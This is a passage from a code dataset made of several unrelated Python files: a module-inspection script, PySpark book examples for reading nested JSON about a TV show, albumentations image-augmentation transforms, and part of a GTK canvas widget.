22 male\")\n print(ret)\n print(ret2)\n print(ret3)\n print(ret4)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"正则表达式/demo04.py","file_name":"demo04.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"395309324","text":"#!/usr/bin/env python\n\nimport importlib\nimport inspect\nimport os\nimport sys\n\n# Add the path of the module you want to inspect here, if necessary\nsys.path.insert(1,\"test\" )\n\nfiles=[]\n\n\n\t\nimport test.b as target\nfrom test.b import *\n\n# Keep track of inspected modules here\ninspected = []\n\n# Define some functions for inspecting child members, so they \n# can be used recursively\ndef module_classes(module):\n \"\"\"\nPrints a recursive list of package-members\n\"\"\"\n inspected.append(module)\n print('='*80)\n print(module)\n print('-'*80)\n members = inspect.getmembers(module, inspect.isclass)\n for member in members:\n print(member[0], member[1].__mro__)\n print('='*80)\n children = inspect.getmembers(module, inspect.ismodule)\n if children:\n for child in children:\n if child[1] not in inspected:\n importlib.import_module(module.__name__, child[0])\n print()\n module_classes(child[1])\n\nmodule_classes(target)\n","sub_path":"parseClasses.py","file_name":"parseClasses.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"294646570","text":"\"\"\"Code for the PySpark In Action book, chapter 6.\"\"\"\n\n# pylint: disable=C0302, C0413\n\n# tag::ch06-reading-json-python[]\nimport json # <1>\n\nsample_json = \"\"\"{\n \"id\": 143,\n \"name\": \"Silicon Valley\",\n \"type\": \"Scripted\",\n \"language\": \"English\",\n \"genres\": [\n \"Comedy\"\n ],\n \"network\": {\n \"id\": 8,\n \"name\": \"HBO\",\n \"country\": {\n \"name\": \"United States\",\n \"code\": \"US\",\n \"timezone\": \"America/New_York\"\n }\n }\n}\"\"\"\n\ndocument = json.loads(sample_json)\nprint(document) # <2>\n# {'id': 143,\n# 'name': 'Silicon Valley',\n# 'type': 'Scripted',\n# 'language': 'English',\n# 'genres': ['Comedy'],\n# 'network': {'id': 8,\n# 'name': 'HBO',\n# 'country': {'name': 'United States',\n# 'code': 'US',\n# 'timezone': 'America/New_York'}}}\n\ntype(document)\n# dict <3>\n\n# end::ch06-reading-json-python[]\n\n# tag::ch06-reading-the-data[]\n\nfrom pyspark.sql import SparkSession\n\nspark = SparkSession.builder.getOrCreate()\n\nshows = spark.read.json(\"../../data/Ch06/shows-silicon-valley.json\") # <1>\n\nshows.count()\n# 1 <2>\n# end::ch06-reading-the-data[]\n\nassert shows.count() == 1\n\n# tag::ch06-json-multi[]\n\nthree_shows = spark.read.json(\n \"../../data/Ch06/shows-*.json\", multiLine=True\n)\n\nthree_shows.count()\n# 3\n\nassert three_shows.count() == 3\n\n# end::ch06-json-multi[]\n\n# tag::ch06-json-print-schema[]\n\nshows.printSchema()\n# root <1>\n# |-- _embedded: struct (nullable = true) <2>\n# | |-- episodes: array (nullable = true)\n# | | |-- element: struct (containsNull = true)\n# | | | |-- _links: struct (nullable = true)\n# | | | | |-- self: struct (nullable = true)\n# | | | | | |-- href: string (nullable = true)\n# | | | |-- airdate: string (nullable = true)\n# | | | |-- airstamp: string (nullable = true)\n# | | | |-- airtime: string (nullable = true)\n# | | | |-- id: long (nullable = true)\n# | | | |-- image: struct (nullable = true)\n# | | | | |-- medium: string (nullable = true)\n# | | | | |-- original: string (nullable = true)\n# | | | |-- name: string (nullable = true)\n# | | | |-- number: long (nullable = true)\n# | | | |-- runtime: long (nullable = true)\n# | | | |-- season: long (nullable = true)\n# | | | |-- summary: string (nullable = true)\n# | | | |-- url: string (nullable = true)\n# |-- _links: struct (nullable = true)\n# | |-- previousepisode: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# | |-- self: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# |-- externals: struct (nullable = true)\n# | |-- imdb: string (nullable = true)\n# | |-- thetvdb: long (nullable = true)\n# | |-- tvrage: long (nullable = true)\n# |-- genres: array (nullable = true)\n# | |-- element: string (containsNull = true)\n# |-- id: long (nullable = true)\n# [and more columns...]\n\n# end::ch06-json-print-schema[]\n\n\n# tag::ch06-first-layer-col[]\n\nprint(shows.columns)\n\n# ['_embedded', '_links', 'externals', 'genres', 'id', 'image',\n# 'language', 'name', 'network', 'officialSite', 'premiered',\n# 'rating', 'runtime', 'schedule', 'status', 'summary', 'type',\n# 'updated', 'url', 'webChannel', 'weight']\n\n# end::ch06-first-layer-col[]\n\n# tag::ch06-array-column[]\narray_subset = shows.select(\"name\", \"genres\")\n\narray_subset.show(1, False)\n# +--------------+--------+\n# |name |genres |\n# +--------------+--------+\n# |Silicon Valley|[Comedy]|\n# +--------------+--------+\n\n# end::ch06-array-column[]\n\n# tag::ch06-array-index[]\nimport pyspark.sql.functions as F\n\narray_subset = array_subset.select(\n \"name\",\n array_subset.genres[0].alias(\"dot_and_index\"), # <1>\n F.col(\"genres\")[0].alias(\"col_and_index\"),\n array_subset.genres.getItem(0).alias(\"dot_and_method\"), # <2>\n F.col(\"genres\").getItem(0).alias(\"col_and_method\"),\n)\n\narray_subset.show()\n\n# +--------------+-------------+-------------+--------------+--------------+\n# | name|dot_and_index|col_and_index|dot_and_method|col_and_method|\n# +--------------+-------------+-------------+--------------+--------------+\n# |Silicon Valley| Comedy| Comedy| Comedy| Comedy|\n# +--------------+-------------+-------------+--------------+--------------+\n\n# end::ch06-array-index[]\n\n# tag::ch06-array-discovery[]\narray_subset_repeated = array_subset.select(\n \"name\",\n F.lit(\"Comedy\").alias(\"one\"),\n F.lit(\"Horror\").alias(\"two\"),\n F.lit(\"Drama\").alias(\"three\"),\n F.col(\"dot_and_index\"),\n).select(\n \"name\",\n F.array(\"one\", \"two\", \"three\").alias(\"Some_Genres\"), # <1>\n F.array_repeat(\"dot_and_index\", 5).alias(\"Repeated_Genres\"), # <2>\n)\n\narray_subset_repeated.show(1, False)\n\n# +--------------+-----------------------+----------------------------------------+\n# |name |Some_Genres |Repeated_Genres |\n# +--------------+-----------------------+----------------------------------------+\n# |Silicon Valley|[Comedy, Horror, Drama]|[Comedy, Comedy, Comedy, Comedy, Comedy]|\n# +--------------+-----------------------+----------------------------------------+\n\narray_subset_repeated.select(\n \"name\", F.size(\"Some_Genres\"), F.size(\"Repeated_Genres\") # <3>\n).show()\n\n# +--------------+-----------------+---------------------+\n# | name|size(Some_Genres)|size(Repeated_Genres)|\n# +--------------+-----------------+---------------------+\n# |Silicon Valley| 3| 5|\n# +--------------+-----------------+---------------------+\n\narray_subset_repeated.select(\n \"name\",\n F.array_distinct(\"Some_Genres\"), # <4>\n F.array_distinct(\"Repeated_Genres\"), # <4>\n).show(1, False)\n\n# +--------------+---------------------------+-------------------------------+\n# |name |array_distinct(Some_Genres)|array_distinct(Repeated_Genres)|\n# +--------------+---------------------------+-------------------------------+\n# |Silicon Valley|[Comedy, Horror, Drama] |[Comedy] |\n# +--------------+---------------------------+-------------------------------+\n\narray_subset_repeated = array_subset_repeated.select(\n \"name\",\n F.array_intersect(\"Some_Genres\", \"Repeated_Genres\").alias( # <5>\n \"Genres\"\n ),\n)\n\narray_subset_repeated.show()\n\n# +--------------+--------+\n# | name| Genres|\n# +--------------+--------+\n# |Silicon Valley|[Comedy]|\n# +--------------+--------+\n\n# end::ch06-array-discovery[]\n\n# tag::ch06-array-position[]\n\narray_subset_repeated.select(\n \"Genres\", F.array_position(\"Genres\", \"Comedy\")\n).show()\n\n# +--------+------------------------------+\n# | Genres|array_position(Genres, Comedy)|\n# +--------+------------------------------+\n# |[Comedy]| 1|\n# +--------+------------------------------+\n\n# end::ch06-array-position[]\n\n# tag::ch06-map-creation[]\n\ncolumns = [\"name\", \"language\", \"type\"]\n\nshows_map = shows.select(\n *[F.lit(column) for column in columns],\n F.array(*columns).alias(\"values\")\n)\n\nshows_map = shows_map.select(F.array(*columns).alias(\"keys\"), \"values\")\n\nshows_map.show(1)\n# +--------------------+--------------------+\n# | keys| values|\n# +--------------------+--------------------+\n# |[name, language, ...|[Silicon Valley, ...|\n# +--------------------+--------------------+\n\nshows_map = shows_map.select(\n F.map_from_arrays(\"keys\", \"values\").alias(\"mapped\")\n)\n\nshows_map.printSchema()\n\n# root\n# |-- mapped: map (nullable = false)\n# | |-- key: string\n# | |-- value: string (valueContainsNull = true)\n\nshows_map.show(1, False)\n\n# +---------------------------------------------------------------+\n# |mapped |\n# +---------------------------------------------------------------+\n# |[name -> Silicon Valley, language -> English, type -> Scripted]|\n# +---------------------------------------------------------------+\n\nshows_map.select(\n F.col(\"mapped.name\"), # <1>\n F.col(\"mapped\")[\"name\"], # <2>\n shows_map.mapped[\"name\"], # <3>\n).show()\n\n# +--------------+--------------+--------------+\n# | name| mapped[name]| mapped[name]|\n# +--------------+--------------+--------------+\n# |Silicon Valley|Silicon Valley|Silicon Valley|\n# +--------------+--------------+--------------+\n\n# end::ch06-map-creation[]\n\n# tag::ch06-struct-subset[]\nshows.select(\"schedule\").printSchema()\n\n# root\n# |-- schedule: struct (nullable = true) <1>\n# | |-- days: array (nullable = true)\n# | | |-- element: string (containsNull = true)\n# | |-- time: string (nullable = true)\n\n# end::ch06-struct-subset[]\n\n# tag::ch06-embedded[]\n\nshows.select(F.col(\"_embedded\")).printSchema()\n# root\n# |-- _embedded: struct (nullable = true) <1>\n# | |-- episodes: array (nullable = true) <2>\n# | | |-- element: struct (containsNull = true)\n# | | | |-- _links: struct (nullable = true) <3>\n# | | | | |-- self: struct (nullable = true)\n# | | | | | |-- href: string (nullable = true)\n# | | | |-- airdate: string (nullable = true)\n# | | | |-- id: long (nullable = true)\n# | | | |-- image: struct (nullable = true)\n# | | | | |-- medium: string (nullable = true)\n# | | | | |-- original: string (nullable = true)\n# | | | |-- name: string (nullable = true)\n# | | | |-- number: long (nullable = true)\n# | | | |-- runtime: long (nullable = true)\n# | | | |-- season: long (nullable = true)\n# | | | |-- summary: string (nullable = true)\n# | | | |-- url: string (nullable = true)\n\n# end::ch06-embedded[]\n\n# tag::ch06-promote-to-column[]\nshows_clean = shows.withColumn(\"episodes\", F.col(\"_embedded.episodes\")).drop(\n \"_embedded\"\n)\n\nshows_clean.printSchema()\n# root\n# |-- _links: struct (nullable = true)\n# | |-- previousepisode: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# | |-- self: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# |-- externals: struct (nullable = true)\n# | |-- imdb: string (nullable = true)\n# [...]\n# |-- episodes: array (nullable = true) <1>\n# | |-- element: struct (containsNull = true)\n# | | |-- _links: struct (nullable = true)\n# | | | |-- self: struct (nullable = true)\n# | | | | |-- href: string (nullable = true)\n# | | |-- airdate: string (nullable = true)\n# | | |-- airstamp: string (nullable = true)\n# | | |-- airtime: string (nullable = true)\n# | | |-- id: long (nullable = true)\n# | | |-- image: struct (nullable = true)\n# | | | |-- medium: string (nullable = true)\n# | | | |-- original: string (nullable = true)\n# [... rest of schema]\n# end::ch06-promote-to-column[]\n\n# tag::ch06-array-struct[]\n\nepisodes_name = shows_clean.select(F.col(\"episodes.name\")) # <1>\nepisodes_name.printSchema()\n\n# root\n# |-- name: array (nullable = true)\n# | |-- element: string (containsNull = true)\n\nepisodes_name.select(F.explode(\"name\").alias(\"name\")).show(3, False) # <2>\n# +-------------------------+\n# |name |\n# +-------------------------+\n# |Minimum Viable Product |\n# |The Cap Table |\n# |Articles of Incorporation|\n# +-------------------------+\n# end::ch06-array-struct[]\n\n# tag::ch06-schema-example[]\nshows.printSchema()\n# root # <1>\n# |-- _links: struct (nullable = true)\n# | |-- previousepisode: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# | |-- self: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# |-- externals: struct (nullable = true)\n# | |-- imdb: string (nullable = true)\n# [... rest of schema]\n# end::ch06-schema-example[]\n\n# tag::ch06-first-part-schema[]\n\nimport pyspark.sql.types as T\n\nepisode_links_schema = T.StructType(\n [T.StructField(\"self\", T.StructType([T.StructField(\"href\", T.StringType())]))]\n) # <1>\n\nepisode_image_schema = T.StructType(\n [\n T.StructField(\"medium\", T.StringType()),\n T.StructField(\"original\", T.StringType()),\n ]\n) # <2>\n\nepisode_schema = T.StructType(\n [\n T.StructField(\"_links\", episode_links_schema), # <3>\n T.StructField(\"airdate\", T.DateType()),\n T.StructField(\"airstamp\", T.TimestampType()),\n T.StructField(\"airtime\", T.StringType()),\n T.StructField(\"id\", T.StringType()),\n T.StructField(\"image\", episode_image_schema), # <3>\n T.StructField(\"name\", T.StringType()),\n T.StructField(\"number\", T.LongType()),\n T.StructField(\"runtime\", T.LongType()),\n T.StructField(\"season\", T.LongType()),\n T.StructField(\"summary\", T.StringType()),\n T.StructField(\"url\", T.StringType()),\n ]\n)\n\nembedded_schema = T.StructType(\n [T.StructField(\"episodes\", T.ArrayType(episode_schema))] # <4>\n)\n\n# end::ch06-first-part-schema[]\n\n# tag::ch06-full-schema[]\n\nepisode_links_schema = T.StructType(\n [T.StructField(\"self\", T.StructType([T.StructField(\"href\", T.StringType())]))]\n)\n\nepisode_image_schema = T.StructType(\n [\n T.StructField(\"medium\", T.StringType()),\n T.StructField(\"original\", T.StringType()),\n ]\n)\n\nepisode_schema = T.StructType(\n [\n T.StructField(\"_links\", episode_links_schema),\n T.StructField(\"airdate\", T.DateType()),\n T.StructField(\"airstamp\", T.TimestampType()),\n T.StructField(\"airtime\", T.StringType()),\n T.StructField(\"id\", T.StringType()),\n T.StructField(\"image\", episode_image_schema),\n T.StructField(\"name\", T.StringType()),\n T.StructField(\"number\", T.LongType()),\n T.StructField(\"runtime\", T.LongType()),\n T.StructField(\"season\", T.LongType()),\n T.StructField(\"summary\", T.StringType()),\n T.StructField(\"url\", T.StringType()),\n ]\n)\n\nembedded_schema = T.StructType([T.StructField(\"episodes\", T.ArrayType(episode_schema))])\n\nnetwork_schema = T.StructType(\n [\n T.StructField(\n \"country\",\n T.StructType(\n [\n T.StructField(\"code\", T.StringType()),\n T.StructField(\"name\", T.StringType()),\n T.StructField(\"timezone\", T.StringType()),\n ]\n ),\n ),\n T.StructField(\"id\", T.LongType()),\n T.StructField(\"name\", T.StringType()),\n ]\n)\n\nshows_schema = T.StructType(\n [\n T.StructField(\"_embedded\", embedded_schema),\n T.StructField(\"language\", T.StringType()),\n T.StructField(\"name\", T.StringType()),\n T.StructField(\"network\", network_schema),\n T.StructField(\"officialSite\", T.StringType()),\n T.StructField(\"premiered\", T.StringType()),\n T.StructField(\n \"rating\", T.StructType([T.StructField(\"average\", T.DoubleType())])\n ),\n T.StructField(\"runtime\", T.LongType()),\n T.StructField(\n \"schedule\",\n T.StructType(\n [\n T.StructField(\"days\", T.ArrayType(T.StringType())),\n T.StructField(\"time\", T.StringType()),\n ]\n ),\n ),\n T.StructField(\"status\", T.StringType()),\n T.StructField(\"summary\", T.StringType()),\n T.StructField(\"type\", T.StringType()),\n T.StructField(\"updated\", T.LongType()),\n T.StructField(\"url\", T.StringType()),\n T.StructField(\"webChannel\", T.StringType()),\n T.StructField(\"weight\", T.LongType()),\n ]\n)\n# end::ch06-full-schema[]\n\n# tag::ch06-reread[]\n\nshows_with_schema = spark.read.json(\n \"../../data/Ch06/shows-silicon-valley.json\",\n schema=shows_schema, # <1>\n mode=\"FAILFAST\", # <2>\n)\n\n# end::ch06-reread[]\n\n# tag::ch06-schema-validation[]\nfor column in [\"airdate\", \"airstamp\"]:\n shows.select(f\"_embedded.episodes.{column}\").select(F.explode(column)).show(5)\n\n# +----------+\n# | col|\n# +----------+\n# |2014-04-06|\n# |2014-04-13|\n# |2014-04-20|\n# |2014-04-27|\n# |2014-05-04|\n# +----------+\n# only showing top 5 rows\n\n# +-------------------+\n# | col|\n# +-------------------+\n# |2014-04-06 22:00:00|\n# |2014-04-13 22:00:00|\n# |2014-04-20 22:00:00|\n# |2014-04-27 22:00:00|\n# |2014-05-04 22:00:00|\n# +-------------------+\n# only showing top 5 rows\n\n# end::ch06-schema-validation[]\n\n# tag::ch06-wrong-schema[]\nfrom py4j.protocol import Py4JJavaError # <1>\n\nshows_schema2 = T.StructType(\n [\n T.StructField(\"_embedded\", embedded_schema),\n T.StructField(\"language\", T.StringType()),\n T.StructField(\"name\", T.StringType()),\n T.StructField(\"network\", network_schema),\n T.StructField(\"officialSite\", T.StringType()),\n T.StructField(\"premiered\", T.StringType()),\n T.StructField(\n \"rating\", T.StructType([T.StructField(\"average\", T.DoubleType())])\n ),\n T.StructField(\"runtime\", T.LongType()),\n T.StructField(\n \"schedule\",\n T.StructType(\n [\n T.StructField(\"days\", T.ArrayType(T.StringType())),\n T.StructField(\"time\", T.StringType()),\n ]\n ),\n ),\n T.StructField(\"status\", T.StringType()),\n T.StructField(\"summary\", T.StringType()),\n T.StructField(\"type\", T.LongType()), # <2>\n T.StructField(\"updated\", T.LongType()),\n T.StructField(\"url\", T.LongType()), # <2>\n T.StructField(\"webChannel\", T.StringType()),\n T.StructField(\"weight\", T.LongType()),\n ]\n)\n\nshows_with_schema_wrong = spark.read.json(\n \"../../data/Ch06/shows-silicon-valley.json\", schema=shows_schema2, mode=\"FAILFAST\",\n)\n\ntry:\n shows_with_schema_wrong.show()\nexcept Py4JJavaError:\n pass\n\n# Huge Spark ERROR stacktrace, relevant bit:\n#\n# Caused by: java.lang.RuntimeException: Failed to parse a value for data type\n# bigint (current token: VALUE_STRING). <3>\n\n# end::ch06-wrong-schema[]\n\n# tag::ch06-json-schema[]\n\nimport pprint # <1>\n\npprint.pprint(shows_with_schema.select(\"schedule\").schema.jsonValue())\n# {'fields': [{'metadata': {},\n# 'name': 'schedule',\n# 'nullable': True,\n# 'type': {'fields': [{'metadata': {},\n# 'name': 'days',\n# 'nullable': True,\n# 'type': {'containsNull': True,\n# 'elementType': 'string',\n# 'type': 'array'}},\n# {'metadata': {},\n# 'name': 'time',\n# 'nullable': True,\n# 'type': 'string'}],\n# 'type': 'struct'}}],\n# 'type': 'struct'}\n# end::ch06-json-schema[]\n\n# tag::ch06-complex-json[]\n\npprint.pprint(T.StructField(\"array_example\", T.ArrayType(T.StringType())).jsonValue())\n\n# {'metadata': {},\n# 'name': 'array_example',\n# 'nullable': True,\n# 'type': {'containsNull': True, 'elementType': 'string', 'type': 'array'}} # <1>\n\npprint.pprint(\n T.StructField(\"map_example\", T.MapType(T.StringType(), T.LongType())).jsonValue()\n)\n\n# {'metadata': {},\n# 'name': 'map_example',\n# 'nullable': True,\n# 'type': {'keyType': 'string',\n# 'type': 'map',\n# 'valueContainsNull': True,\n# 'valueType': 'long'}} <2>\n\npprint.pprint(\n T.StructType(\n [\n T.StructField(\"map_example\", T.MapType(T.StringType(), T.LongType())),\n T.StructField(\"array_example\", T.ArrayType(T.StringType())),\n ]\n ).jsonValue()\n)\n\n# {'fields': [{'metadata': {}, <3>\n# 'name': 'map_example',\n# 'nullable': True,\n# 'type': {'keyType': 'string',\n# 'type': 'map',\n# 'valueContainsNull': True,\n# 'valueType': 'long'}},\n# {'metadata': {},\n# 'name': 'array_example',\n# 'nullable': True,\n# 'type': {'containsNull': True,\n# 'elementType': 'string',\n# 'type': 'array'}}],\n# 'type': 'struct'}\n\n# end::ch06-complex-json[]\n\n# tag::ch06-json-schema-comparison[]\n\nother_shows_schema = T.StructType.fromJson(json.loads(shows_with_schema.schema.json()))\n\nprint(other_shows_schema == shows_with_schema.schema) # True\n# end::ch06-json-schema-comparison[]\n\n# tag::ch06-explode[]\nepisodes = shows.select(\"id\", F.explode(\"_embedded.episodes\").alias(\"episodes\")) # <1>\nepisodes.show(5)\n# +---+--------------------+\n# | id| episodes|\n# +---+--------------------+\n# |143|[[[http://api.tvm...|\n# |143|[[[http://api.tvm...|\n# |143|[[[http://api.tvm...|\n# |143|[[[http://api.tvm...|\n# |143|[[[http://api.tvm...|\n# +---+--------------------+\n# only showing top 5 rows\n\nepisodes.count() # 53\n\n# end::ch06-explode[]\n\n# tag::ch06-explode-map[]\nepisode_name_id = shows.select(\n F.map_from_arrays( # <1>\n F.col(\"_embedded.episodes.id\"), F.col(\"_embedded.episodes.name\")\n ).alias(\"name_id\")\n)\n\nepisode_name_id = episode_name_id.select(\n F.posexplode(\"name_id\").alias(\"position\", \"id\", \"name\") # <2>\n)\n\nepisode_name_id.show(5)\n\n# +--------+-----+--------------------+\n# |position| id| name|\n# +--------+-----+--------------------+\n# | 0|10897|Minimum Viable Pr...|\n# | 1|10898| The Cap Table|\n# | 2|10899|Articles of Incor...|\n# | 3|10900| Fiduciary Duties|\n# | 4|10901| Signaling Risk|\n# +--------+-----+--------------------+\n# only showing top 5 rows\n\n# end::ch06-explode-map[]\n\n# tag::ch06-collect[]\ncollected = episodes.groupby(\"id\").agg(F.collect_list(\"episodes\").alias(\"episodes\"))\n\ncollected.count() # 1\n\ncollected.printSchema()\n# |-- id: long (nullable = true)\n# |-- episodes: array (nullable = true)\n# | |-- element: struct (containsNull = false)\n# | | |-- _links: struct (nullable = true)\n# | | | |-- self: struct (nullable = true)\n# | | | | |-- href: string (nullable = true)\n# | | |-- airdate: string (nullable = true)\n# | | |-- airstamp: timestamp (nullable = true)\n# | | |-- airtime: string (nullable = true)\n# | | |-- id: long (nullable = true)\n# | | |-- image: struct (nullable = true)\n# | | | |-- medium: string (nullable = true)\n# | | | |-- original: string (nullable = true)\n# | | |-- name: string (nullable = true)\n# | | |-- number: long (nullable = true)\n# | | |-- runtime: long (nullable = true)\n# | | |-- season: long (nullable = true)\n# | | |-- summary: string (nullable = true)\n# | | |-- url: string (nullable = true)\n# end::ch06-collect[]\n\n# tag::ch06-struct-in-struct[]\nstruct_ex = shows.select(\n F.struct( # <1>\n F.col(\"status\"), F.col(\"weight\"), F.lit(True).alias(\"has_watched\")\n ).alias(\"info\")\n)\n\nstruct_ex.show(1, False)\n# +-----------------+\n# |info |\n# +-----------------+\n# |[Ended, 96, true]| <2>\n# +-----------------+\n\nstruct_ex.printSchema()\n# root\n# |-- info: struct (nullable = false) <2>\n# | |-- status: string (nullable = true)\n# | |-- weight: long (nullable = true)\n# | |-- has_watched: boolean (nullable = false)\n# end::ch06-struct-in-struct[]\n","sub_path":"code/Ch06/book_code.py","file_name":"book_code.py","file_ext":"py","file_size_in_byte":23389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"447150300","text":"import cv2\nimport numpy as np\nimport albumentations as A\nfrom albumentations.pytorch.transforms import ToTensorV2\n\nclass Denormalize(object):\n \"\"\"\n Denormalize image and boxes for visualization\n \"\"\"\n def __init__(self, mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225], **kwargs):\n self.mean = mean\n self.std = std\n \n def __call__(self, img, box = None, label = None, mask = None, **kwargs):\n \"\"\"\n :param img: (tensor) image to be denormalized\n :param box: (list of tensor) bounding boxes to be denormalized, by multiplying them with image's width and heights. Format: (x,y,width,height)\n \"\"\"\n mean = np.array(self.mean)\n std = np.array(self.std)\n img_show = img.numpy().squeeze().transpose((1,2,0))\n img_show = (img_show * std+mean)\n img_show = np.clip(img_show,0,1)\n return img_show\n\ndef get_resize_augmentation(image_size, keep_ratio=False, box_transforms = False):\n\n bbox_params = A.BboxParams(\n format='pascal_voc', \n min_area=0, \n min_visibility=0,\n label_fields=['class_labels']) if box_transforms else None\n\n if not keep_ratio:\n return A.Compose([\n A.Resize(\n height = image_size[1],\n width = image_size[0]\n )], \n bbox_params= bbox_params) \n else:\n return A.Compose([\n A.LongestMaxSize(max_size=max(image_size)), \n A.PadIfNeeded(min_height=image_size[1], min_width=image_size[0], p=1.0, border_mode=cv2.BORDER_CONSTANT),\n ], \n bbox_params=bbox_params)\n \n\ndef get_augmentation(config, _type='train'):\n train_transforms = A.Compose([\n A.OneOf([\n A.MotionBlur(p=.2),\n A.GaussianBlur(),\n A.MedianBlur(blur_limit=3, p=0.3),\n A.Blur(blur_limit=3, p=0.1),\n ], p=0.3),\n A.ShiftScaleRotate(shift_limit=0.0625, scale_limit=0.2, rotate_limit=20, p=0.3),\n A.CLAHE(clip_limit=2.0, tile_grid_size=(8,8), p=0.5),\n A.OneOf([\n A.HueSaturationValue(hue_shift_limit=0.2, sat_shift_limit= 0.2, \n val_shift_limit=0.2, p=0.9),\n A.RandomBrightnessContrast(brightness_limit=0.1, \n contrast_limit=0.1, \n p=0.3), \n ], p=0.5),\n\n \n A.HorizontalFlip(p=0.3),\n A.VerticalFlip(p=0.3),\n A.RandomRotate90(p=0.3),\n A.Cutout(num_holes=8, max_h_size=64, max_w_size=64, fill_value=0, p=0.5),\n A.Normalize(mean=(0, 0, 0), std=(1, 1, 1), max_pixel_value=255.0, p=1.0),\n ToTensorV2(p=1.0)\n ], bbox_params=A.BboxParams(\n format='pascal_voc',\n min_area=0, \n min_visibility=0, \n label_fields=['class_labels']))\n\n\n val_transforms = A.Compose([\n A.Normalize(mean=(0, 0, 0), std=(1, 1, 1), max_pixel_value=255.0, p=1.0),\n ToTensorV2(p=1.0)\n ], bbox_params=A.BboxParams(\n format='pascal_voc', \n min_area=0, \n min_visibility=0,\n label_fields=['class_labels']))\n \n\n return train_transforms if _type == 'train' else val_transforms","sub_path":"augmentations/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"488910597","text":"from ..colors import native_color\nfrom ..libs import Gdk, Gtk, Pango, cairo\nfrom .base import Widget\n\n\nclass Canvas(Widget):\n def create(self):\n if cairo is None:\n raise RuntimeError(\n \"'import cairo' failed; may need to install python-gi-cairo.\"\n )\n\n self.native = Gtk.DrawingArea()\n\n self.native.connect(\"draw\", self.gtk_draw_callback)\n self.native.connect(\"size-allocate\", self.gtk_on_size_allocate)\n self.native.connect(\"button-press-event\", self.mouse_down)\n self.native.connect(\"button-release-event\", self.mouse_up)\n self.native.connect(\"motion-notify-event\", self.mouse_move)\n self.native.set_events(\n Gdk.EventMask.BUTTON_PRESS_MASK\n | Gdk.EventMask.BUTTON_RELEASE_MASK\n | Gdk.EventMask.BUTTON_MOTION_MASK\n )\n # count number of active clicks\n self.clicks = 0\n\n def gtk_draw_callback(self, canvas, gtk_context):\n \"\"\"Creates a draw callback.\n\n Gtk+ uses a drawing callback to draw on a DrawingArea. Assignment of the\n callback function creates a Gtk+ canvas and Gtk+ context automatically using the\n canvas and gtk_context function arguments. This method calls the draw method on\n the interface Canvas to draw the objects.\n \"\"\"\n self.original_transform_matrix = gtk_context.get_matrix()\n self.interface._draw(self, draw_context=gtk_context)\n\n def gtk_on_size_allocate(self, widget, allocation):\n \"\"\"Called on widget resize, and calls the handler set on the interface, if\n any.\"\"\"\n if self.interface.on_resize:\n self.interface.on_resize(self.interface)\n\n def set_on_resize(self, handler):\n pass\n\n def set_on_press(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def set_on_release(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def set_on_drag(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def set_on_alt_press(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def set_on_alt_release(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def set_on_alt_drag(self, handler):\n \"\"\"No special handling required.\"\"\"\n pass\n\n def mouse_down(self, obj, event):\n self.clicks = 2 if event.type == Gdk.EventType._2BUTTON_PRESS else 1\n if event.button == 1 and self.interface.on_press:\n self.interface.on_press(self.interface, event.x, event.y, self.clicks)\n if event.button == 3 and self.interface.on_alt_press:\n self.interface.on_alt_press(self.interface, event.x, event.y, self.clicks)\n\n def mouse_move(self, obj, event):\n if self.clicks == 0:\n return\n if event.state == Gdk.ModifierType.BUTTON1_MASK and self.interface.on_drag:\n self.interface.on_drag(self.interface, event.x, event.y, self.clicks)\n if event.state == Gdk.ModifierType.BUTTON3_MASK and self.interface.on_alt_drag:\n self.interface.on_alt_drag(self.interface, event.x, event.y, self.clicks)\n\n def mouse_up(self, obj, event):\n if event.button == 1 and self.interface.on_release:\n self.interface.on_release(self.interface, event.x, event.y, self.clicks)\n if event.button == 3 and self.interface.on_alt_release:\n self.interface.on_alt_release(self.interface, event.x, event.y, self.clicks)\n self.clicks = 0\n\n def redraw(self):\n self.native.queue_draw()\n\n # Basic paths\n\n def new_path(self, draw_context, *args, **kwargs):\n draw_context.new_path()\n\n def closed_path(self, x, y, draw_context, *args, **kwargs):\n draw_context.close_path()\n\n def move_to(self, x, y, draw_context, *args, **kwargs):\n draw_context.move_to(x, y)\n\n def line_to(self, x, y, draw_context, *args, **kwargs):\n draw_context.line_to(x, y)\n\n # Basic shapes\n\n def bezier_curve_to(\n self, cp1x, cp1y, cp2x, cp2y, x, y, draw_context, *args, **kwargs\n ):\n draw_context.curve_to(cp1x, cp1y, cp2x, cp2y, x, y)\n\n def quadratic_curve_to(self, cpx, cpy, x, y, draw_context, *args, **kwargs):\n draw_context.curve_to(cpx, cpy, cpx, cpy, x, y)\n\n def arc(\n self,\n x,\n y,\n radius,\n startangle,\n endangle,\n anticlockwise,\n draw_context,\n *args,\n **kwargs\n ):\n if anticlockwise:\n draw_context.arc_negative(x, y, radius, startangle, endangle)\n else:\n draw_context.arc(x, y, radius, startangle, endangle)\n\n def ellipse(\n self,\n x,\n y,\n radiusx,\n radiusy,\n rotation,\n startangle,\n endangle,\n anticlockwise,\n draw_context,\n *args,\n **kwargs\n ):\n draw_context.save()\n draw_context.translate(x, y)\n if radiusx >= radiusy:\n draw_context.scale(1, radiusy / radiusx)\n self.arc(0, 0, radiusx, startangle, endangle, anticlockwise, draw_context)\n else:\n draw_context.scale(radiusx / radiusy, 1)\n self.arc(0, 0, radiusy, 